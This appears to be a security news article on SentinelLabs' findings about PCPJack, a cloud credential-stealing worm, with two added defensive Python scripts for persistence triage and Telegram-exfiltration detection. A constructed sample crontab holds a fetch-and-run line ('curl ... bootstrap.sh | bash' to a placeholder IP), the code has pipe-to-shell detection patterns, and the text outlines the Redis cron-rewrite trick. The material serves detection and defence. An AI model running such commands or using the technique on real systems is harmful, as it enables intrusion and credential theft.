PCPJack Worm Steals Cloud Credentials, Wipes TeamPCP Infections
SentinelLabs uncovers PCPJack, a credential-stealing worm targeting Docker, Kubernetes, Redis, and MongoDB that actively removes rival TeamPCP access from compromised cloud...

Executive Summary
A new self-propagating malware framework dubbed PCPJack is actively stealing credentials from exposed cloud infrastructure — including Docker, Kubernetes, Redis, MongoDB, and RayML — while deliberately removing competing infections from the same systems. Researchers at SentinelLabs reported the campaign on May 7, 2026, noting that PCPJack appears designed for large-scale credential theft, likely monetized through financial fraud, spam operations, credential resale, or extortion. The worm explicitly targets and cleans artifacts left by the known threat group TeamPCP, leading SentinelLabs to assess with moderate confidence that PCPJack was developed by a former TeamPCP affiliate or member who started their own operation.
Technical Analysis
PCPJack infects Linux-based cloud systems via a shell script named bootstrap.sh. Upon execution, the script creates a hidden working directory, installs Python dependencies, downloads additional modules, establishes persistence, and launches the main orchestrator (monitor.py). During this initial stage, the malware explicitly checks for TeamPCP tooling and attempts to delete all TeamPCP processes, services, containers, files, and persistence artifacts, effectively claiming the compromised host for itself.
The malware's credential theft is broad. It targets cloud provider credentials, developer tooling, messaging applications, financial services, databases, and specific secret types including SSH keys, Slack tokens, WordPress configuration files (wp-config.php), OpenAI and Anthropic API keys, Discord tokens, and DigitalOcean tokens. Stolen material is encrypted with a key agreed via X25519 ECDH and then sealed with ChaCha20-Poly1305, so the operator's private key is needed to read it even if a defender captures the traffic or gains access to the bot channel. The ciphertext is split into 2800-byte chunks and posted to Telegram channels, keeping each message under the Bot API's 4096-character limit.
Propagation works in two ways. The worm scans external cloud address space for exposed services (the Docker daemon API, the Kubernetes API server, Redis, MongoDB, and RayML) and abuses those that answer without authentication, and it exploits known web-application vulnerabilities for initial access. SentinelLabs identified five CVEs in use:
- CVE-2025-29927: Authentication bypass in Next.js middleware via a crafted x-middleware-subrequest header
- CVE-2025-55182 ("React2Shell"): Server Actions deserialization flaw in React and Next.js
- CVE-2026-1357: Unauthenticated file upload in WPVivid Backup
- CVE-2025-9501: PHP injection in W3 Total Cache via cached mfunc comment
- CVE-2025-48703: Shell injection in CentOS Web Panel Filemanager changePerm functionality
The worm also pulls hostnames out of Common Crawl parquet files and feeds them to its scanner as new targets, so a host does not have to be found by random scanning to be hit. Inside a compromised environment, PCPJack moves laterally by harvesting SSH keys and credentials, enumerating Kubernetes clusters and Docker daemons, and executing itself on the internal hosts it can reach. It then establishes persistence through systemd services, cron jobs, cron files rewritten through an exposed Redis instance (the well-known technique of pointing Redis's dump directory at a cron spool and saving a crafted key), or privileged containers, before continuing to propagate.
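A responder who suspects one of these persistence mechanisms wants a quick triage over crontabs, systemd units and the Redis persistence settings. The script below is an added example written for this article, not SentinelLabs' tooling or anything recovered from PCPJack. It runs over constructed samples: the file names bootstrap.sh and monitor.py come from the analysis above, while the hidden-directory locations, the documentation-range IP 203.0.113.5 and the "suspicious" patterns themselves are assumptions about what a worm of this kind leaves behind.

```python
"""Triage of cron, systemd and Redis persistence (added example, not PCPJack code)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    source: str   # where the hit came from: cron, systemd:<unit>, redis
    rule: str     # which pattern fired
    line: str     # the offending line, for the analyst


# Assumed indicators: dot-directories under /tmp, /var/tmp, /dev/shm, /root, /home/*;
# curl/wget piped into a shell; the script names reported for PCPJack.
HIDDEN_DIR = re.compile(r"(?:^|[\s=:'\"])(/(?:tmp|var/tmp|dev/shm|root|home/[^/\s]+)/\.[^\s'\"]+)")
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba)?sh\b")
KNOWN_NAMES = re.compile(r"\b(?:bootstrap\.sh|monitor\.py)\b")
CRON_SPOOL = re.compile(r"^/(?:var/spool/cron|etc/cron\.d)")

RULES = (
    ("hidden-dir", HIDDEN_DIR),
    ("pipe-to-shell", PIPE_TO_SHELL),
    ("known-name", KNOWN_NAMES),
)


def _apply_rules(source, line):
    return [Finding(source, name, line) for name, rx in RULES if rx.search(line)]


def scan_cron(text):
    """Check every active crontab entry (comments and blank lines skipped)."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if line and not line.startswith("#"):
            findings.extend(_apply_rules("cron", line))
    return findings


def scan_systemd_unit(name, text):
    """Only the Exec* lines of a unit can launch code, so only they are checked."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("ExecStart"):
            findings.extend(_apply_rules(f"systemd:{name}", line))
    return findings


def check_redis_persistence(config):
    """config: the dir/dbfilename pair as returned by CONFIG GET.

    A Redis that writes its RDB dump into a cron spool is the classic cron
    rewrite: the attacker sets dir and dbfilename, stores a crontab line in a
    key and issues SAVE, and cron later parses the dump file.
    """
    rdb_dir = config.get("dir", "")
    if CRON_SPOOL.match(rdb_dir):
        detail = f"dir={rdb_dir} dbfilename={config.get('dbfilename', '')}"
        return Finding("redis", "rdb-in-cron-spool", detail)
    return None


# Constructed samples for the demo; not taken from a real host.
SAMPLE_CRONTAB = """\
# constructed sample
*/5 * * * * /usr/bin/python3 /root/.cache/.sys/monitor.py
0 * * * * curl -fsSL http://203.0.113.5/bootstrap.sh | bash
30 2 * * * /usr/sbin/logrotate /etc/logrotate.conf
"""

SAMPLE_UNIT = """\
[Unit]
Description=System Monitor
[Service]
ExecStart=/usr/bin/python3 /root/.cache/.sys/monitor.py
Restart=always
[Install]
WantedBy=multi-user.target
"""

if __name__ == "__main__":
    for f in scan_cron(SAMPLE_CRONTAB) + scan_systemd_unit("sysmon.service", SAMPLE_UNIT):
        print(f"{f.source:22} {f.rule:16} {f.line}")
    print(check_redis_persistence({"dir": "/var/spool/cron", "dbfilename": "root"}))
```

On a live host the inputs would come from `crontab -l` for each user plus /etc/cron.d, the unit files under /etc/systemd/system, and `redis-cli CONFIG GET dir` / `CONFIG GET dbfilename`; the patterns are a starting point and will need tuning to local naming conventions.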
SentinelLabs also discovered a Sliver-based backdoor on the threat actor's infrastructure, with variants supporting x86_64, x86, and ARM architectures, indicating the operator maintains a secondary access method.
Tactics, Techniques & Procedures
PCPJack's operational flow follows a consistent pattern: initial access by exploiting public-facing applications (T1190), credential harvesting from password stores (T1555) and the cloud instance metadata API (T1552.005), lateral movement over SSH using harvested keys (T1021.004), persistence through systemd services (T1543.002) and cron (T1053.003), and exfiltration over Telegram as a web service (T1567). The deliberate removal of TeamPCP artifacts is notable: it suggests the operator views rival infections as competition for the same monetizable access, rather than simply cleaning house for stealth.
Threat Actor Context
SentinelLabs draws a direct lineage between PCPJack and TeamPCP, a cloud-focused threat group known for high-profile supply-chain breaches against Aqua Security's Trivy scanner, the LiteLLM and Telnyx PyPI packages, and most recently SAP npm packages. The researchers noted that many of the services targeted by PCPJack mirror early TeamPCP/PCPCat campaigns from December 2025, before the group's high-visibility operations in early 2026 brought significant attention and purportedly led to changes in group membership. SentinelLabs stated: "We believe this could be a former operator who is deeply familiar with the group's tooling." This attribution carries moderate confidence: the evidence is circumstantial but consistent.
Mitigations & Recommendations
SentinelLabs recommends the following measures to reduce exposure to PCPJack and similar credential-harvesting worms:
- Enforce multi-factor authentication (MFA) on all cloud management interfaces and developer platforms.
- Require IMDSv2 on AWS instances (HttpTokens=required, with a PUT response hop limit of 1 where containers do not legitimately need metadata access), so instance credentials cannot be read with a plain GET from a compromised workload or through SSRF.
- Never expose the Docker daemon API (TCP 2375), the Kubernetes API server, Redis, or MongoDB to the internet without authentication: bind them to localhost or a private interface, require TLS client certificates for remote Docker access, enable protected-mode and requirepass or ACLs on Redis, and turn on authentication for MongoDB.
- Follow least-privilege principles for service accounts and API keys.
- Avoid storing secrets in plaintext files or environment variables; use a secrets manager.
- Monitor for outbound connections to api.telegram.org from cloud workloads that have no business reason to reach it; a burst of similar-sized POSTs from a single workload is consistent with the chunked exfiltration described above.
- Apply patches for the five CVEs listed above, particularly CVE-2025-29927 (Next.js auth bypass) and CVE-2026-1357 (WPVivid Backup file upload), which are actively exploited in the wild.
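The Telegram monitoring recommendation is easy to state and fiddly to operationalize, so here is an added example (written for this article, not SentinelLabs' detection content) that runs over a constructed egress log. The log format (timestamp, source workload, destination host, method, path, request bytes, whitespace-separated) is an assumption; a real proxy, NetFlow or eBPF egress source needs its own parser. The 2800-byte chunk size is the figure reported in the analysis above, the 512-byte allowance for JSON framing around each chunk is a guess, and the bot tokens in the sample are made up. The example also redacts the secret half of any bot token before it lands in a report, since the token itself is a credential a responder should not paste into a ticket.

```python
"""Flag workloads talking to the Telegram Bot API and score chunked-exfil bursts
(added example, not SentinelLabs' or PCPJack's code)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

TELEGRAM_HOSTS = {"api.telegram.org"}
CHUNK_BYTES = 2800      # chunk size reported for PCPJack
FRAMING_SLACK = 512     # assumed overhead for chat_id and JSON framing

LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<host>\S+)\s+(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+(?P<bytes>\d+)$"
)
BOT_PATH = re.compile(r"/bot(?P<id>\d+):(?P<secret>[A-Za-z0-9_-]{20,})/(?P<call>\w+)")


def parse_line(line):
    m = LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
    rec["bytes"] = int(rec["bytes"])
    return rec


def mask_token(path):
    """Keep the numeric bot id as an indicator, drop the secret half of the token."""
    return BOT_PATH.sub(lambda m: f"/bot{m.group('id')}:<redacted>/{m.group('call')}", path)


def looks_chunked(nbytes):
    return CHUNK_BYTES <= nbytes <= CHUNK_BYTES + FRAMING_SLACK


def max_calls_in_window(times, window):
    """Largest number of requests from one source inside any sliding window."""
    times = sorted(times)
    best, j = 0, 0
    for i, t in enumerate(times):
        while t - times[j] > window:
            j += 1
        best = max(best, i - j + 1)
    return best


def detect(log_text, window=timedelta(minutes=5), min_calls=3):
    """Every source that reached Telegram is reported; bursts of chunk-sized
    POSTs are marked as matching the exfiltration pattern."""
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["host"] in TELEGRAM_HOSTS:
            by_src[rec["src"]].append(rec)

    report = []
    for src, recs in sorted(by_src.items()):
        bot_ids = set()
        for r in recs:
            m = BOT_PATH.search(r["path"])
            if m:
                bot_ids.add(m.group("id"))
        chunked = sum(looks_chunked(r["bytes"]) for r in recs)
        burst = max_calls_in_window([r["ts"] for r in recs], window)
        verdict = "burst-exfil-pattern" if burst >= min_calls and chunked >= 2 else "review"
        report.append({
            "src": src, "calls": len(recs), "bot_ids": sorted(bot_ids),
            "chunk_sized": chunked, "max_burst": burst, "verdict": verdict,
            "sample": mask_token(recs[0]["path"]),
        })
    return report


# Constructed egress log; tokens and workload names are invented.
SAMPLE_EGRESS = """\
2026-05-07T10:00:01Z pod/worker-7f9c api.telegram.org POST /bot7123456789:AAF0xq9ZkQ2Ls8xT1vB3nC5mD7eF9gH1jK3/sendMessage 2963
2026-05-07T10:00:02Z pod/worker-7f9c api.telegram.org POST /bot7123456789:AAF0xq9ZkQ2Ls8xT1vB3nC5mD7eF9gH1jK3/sendMessage 2971
2026-05-07T10:00:03Z pod/worker-7f9c api.telegram.org POST /bot7123456789:AAF0xq9ZkQ2Ls8xT1vB3nC5mD7eF9gH1jK3/sendMessage 1410
2026-05-07T10:00:05Z pod/api-5d2a registry-1.docker.io GET /v2/ 512
2026-05-07T10:15:00Z pod/notifier-1 api.telegram.org POST /bot5550001111:AAEabcdefghijklmnopqrstuvwxyz012345/sendMessage 240
"""

if __name__ == "__main__":
    for entry in detect(SAMPLE_EGRESS):
        print(entry)
```

The last request of a chunked upload is usually smaller than the others (the final partial chunk), which is why the verdict requires only two chunk-sized requests rather than all of them; the legitimate notifier in the sample still shows up, but with the "review" verdict, because any workload reaching Telegram deserves a look.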
